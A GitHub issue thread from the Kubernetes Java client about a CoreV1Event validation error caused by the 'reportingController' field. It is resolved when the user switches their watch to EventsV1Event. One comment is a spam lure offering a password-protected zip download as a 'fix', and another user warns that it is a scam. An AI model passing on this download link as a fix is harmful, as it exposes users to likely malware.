### ISSUE TITLE
CoreV1Event JSON validation fails due to missing reportingController field

### ISSUE THREAD

**Issue by restenb** [kubernetes-client/java#3668]
**Describe the bug**
On docker-desktop with the given k8s version, event JSONs contain the field `reportingController`. This is not included in `CoreV1Event.java`, and the validation fails with the error message

**The field `reportingController` in the JSON string is not defined in the `CoreV1Event` properties.**

Raw JSON returned:
`{\"kind\":\"Event\",\"apiVersion\":\"events.k8s.io/v1\",\"metadata\":{\"name\":\"pod\",\"namespace\":\"pods\",\"uid\":\"312e32e1-0c8e-416f-ad47-a6958432bd24\",\"resourceVersion\":\"8108227\",\"creationTimestamp\":\"2024-08-29T14:37:04Z\",\"managedFields\":[{\"manager\":\"kube-scheduler\",\"operation\":\"Update\",\"apiVersion\":\"events.k8s.io/v1\",\"time\":\"2024-08-29T14:37:04Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:action\":{},\"f:eventTime\":{},\"f:note\":{},\"f:reason\":{},\"f:regarding\":{},\"f:reportingController\":{},\"f:reportingInstance\":{},\"f:type\":{}}}]},\"eventTime\":\"2024-08-29T14:37:04.418330Z\",\"reportingController\":\"default-scheduler\",\"reportingInstance\":\"default-scheduler-docker-desktop\",\"action\":\"Binding\",\"reason\":\"Scheduled\",\"regarding\":{\"kind\":\"Pod\",\"namespace\":\"pods\",\"name\":\"pod\",\"uid\":\"52682376-1685-4d80-b507-9e13d827a728\",\"apiVersion\":\"v1\",\"resourceVersion\":\"8108224\"},\"note\":\"Successfully assigned pods/pod1 to docker-desktop\",\"type\":\"Normal\",\"deprecatedSource\":{},\"deprecatedFirstTimestamp\":null,\"deprecatedLastTimestamp\":null}"}`

**Client Version**
`21.0.1`

**Kubernetes Version**
`1.29.1`

**Java Version**
Java 21

**Expected behavior**
The field is present or ignored in validation. 

**Server (please complete the following information):**
 - OS: Windows 10 / Ubuntu 22 WSL
 - Environment: docker-desktop

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VanDavv** [comment]
Please do not click on a link above! This is a scam and some kind of bot!

Infected my issue:

https://github.com/evershopcommerce/evershop/issues/605

and is infecting other repos as well! 

https://github.com/walt-id/waltid-identity/issues/722
https://github.com/csgroup-oss/sharinghub-server/issues/11
https://github.com/samie/Idle/issues/11
https://github.com/AZPixel-Team/Java2Bedrock/issues/4617
https://github.com/cnk3x/xunlei/issues/184
https://github.com/idaholab/moose/issues/28493
https://github.com/internxt/drive-desktop/issues/511
https://github.com/BusKill/usb-a-magnetic-breakaway/issues/11
https://github.com/jOOQ/jOOQ/issues/17148
https://github.com/meilisearch/meilisearch/issues/4902
https://github.com/conda/conda/issues/14197
https://github.com/kubernetes-client/java/issues/3668
https://github.com/AdguardTeam/AdguardFilters/issues/187484

**Comment by brendandburns** [comment]
What code is throwing this? 

It looks like you are trying to parse an `io.k8s.api.events.v1.Event` into a `io.k8s.api.core.v1.Event`

the core event includes a `reportingComponent` vs a `reportingController`

You can find the full API specification here:
https://raw.githubusercontent.com/kubernetes/kubernetes/master/api/openapi-spec/swagger.json

**Comment by restenb** [comment]
That's strange, I'm created a namespaced events watch using `listNamespacedEvent(...)` in `EventsV1Api`. When parsing the event out from the `Watch` object, this error message is seen:

```
{:type java.lang.IllegalArgumentException,
 :message "The field `reportingController` in the JSON string is not defined in the `CoreV1Event` properties.
 :at [io.kubernetes.client.openapi.models.CoreV1Event validateJsonObject "CoreV1Event.java" 605]}],
 :trace [[io.kubernetes.client.openapi.models.CoreV1Event validateJsonObject "CoreV1Event.java" 605] 
            [io.kubernetes.client.openapi.models.CoreV1Event$CustomTypeAdapterFactory$1 read "CoreV1Event.java" 678] 
            [io.kubernetes.client.openapi.models.CoreV1Event$CustomTypeAdapterFactory$1 read "CoreV1Event.java" 668]
```

Maybe it's a type conversion issue somehow in my code, but I'm not invoking `CoreV1Event` or casting anywhere and this still occurs...

**Comment by brendandburns** [comment]
How are you creating the Watch? Can you send your sample code? Watch is a generic type, are you accidentally making it `Watch<CoreV1Event>`?

**Comment by restenb** [comment]
You are right of course. Things were complicated by being in a different language than Java, and I missed that the type being issued to the `createWatch` call in the end was `CoreV1Event`. Everything works again after switching to `EventsV1Event`.
